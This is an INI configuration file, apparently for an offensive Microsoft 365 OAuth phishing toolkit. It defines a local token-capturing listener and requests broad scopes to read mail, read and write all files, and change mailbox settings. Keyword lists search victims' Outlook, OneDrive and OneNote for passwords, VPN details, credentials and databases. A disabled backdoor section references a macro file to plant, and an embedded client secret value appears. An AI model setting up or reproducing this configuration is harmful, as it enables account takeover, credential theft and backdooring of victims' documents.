[server]
host = 127.0.0.1
externalport = 30662
certificate = server.crt
key = server.key
internalport = 8080

[keywords]
outlook = pass,vpn,creds,credentials,new,a
onedrive = password,.config,.xml,db,database,mbd
onenote = pass,user

[backdoor]
enabled = false
macro = "C:\\Test.bas"

[oauth]
clientid = YOUR_CLIENT_ID_HERE
clientsecret = xmw9QTCIvcuL_oNUMneF78-3a-01-tn7Ls
scope = "offline_access contacts.read user.read mail.read notes.read.all mailboxsettings.readwrite files.readWrite.all openid profile"
redirecturi = "http://localhost:30662/gettoken"